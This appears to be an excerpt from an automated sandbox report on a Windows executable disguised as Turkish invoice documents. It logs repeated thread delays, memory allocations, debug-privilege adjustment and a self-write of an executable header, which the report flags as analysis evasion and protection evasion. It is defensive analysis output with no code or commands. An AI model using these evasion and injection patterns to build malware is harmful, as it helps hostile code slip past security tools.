                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMemory allocated: 28A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMemory allocated: 2AB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMemory allocated: 4AB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMemory allocated: 78E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMemory allocated: 6FD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMemory allocated: 89E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMemory allocated: 99E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMemory allocated: 2A40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599452Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 598779Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 598540Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 598386Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 597053Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596779Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596670Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596561Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596452Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596294Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596182Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596039Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595910Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595796Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595687Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595578Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595468Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595358Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595249Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595140Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594908Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594796Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594577Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594468Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594359Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594248Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594140Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594031Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 593916Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 593812Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 592361Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 592250Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 592137Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 592031Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 591919Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 591812Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 591651Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeWindow / User API: threadDelayed 6854Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeWindow / User API: threadDelayed 2983Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 4956Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep count: 34 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2412Thread sleep count: 6854 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2412Thread sleep count: 2983 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -599671s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -599452s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -599343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -599218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -599000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -598890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -598779s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -598656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -598540s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -598386s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -597053s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -596906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -596779s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -596670s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -596561s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -596452s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -596294s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -596182s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -596039s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -595910s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -595796s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -595687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -595578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -595468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -595358s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -595249s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -595140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -595031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -594908s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -594796s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -594687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -594577s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -594468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -594359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -594248s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -594140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -594031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -593916s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -593812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -592361s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -592250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -592137s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -592031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -591919s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -591812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe TID: 2556Thread sleep time: -591651s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599452Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 598779Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 598540Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 598386Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 597053Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596779Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596670Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596561Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596452Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596294Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596182Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 596039Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595910Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595796Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595687Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595578Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595468Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595358Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595249Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595140Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594908Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594796Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594577Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594468Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594359Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594248Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594140Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 594031Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 593916Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 593812Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 592361Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 592250Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 592137Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 592031Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 591919Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 591812Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeThread delayed: delay time: 591651Jump to behavior
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4443408450.0000000000DC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMemory written: C:\Users\user\Desktop\FATURA VE BELGELER..exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess created: C:\Users\user\Desktop\FATURA VE BELGELER..exe "C:\Users\user\Desktop\FATURA VE BELGELER..exe"Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Users\user\Desktop\FATURA VE BELGELER..exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
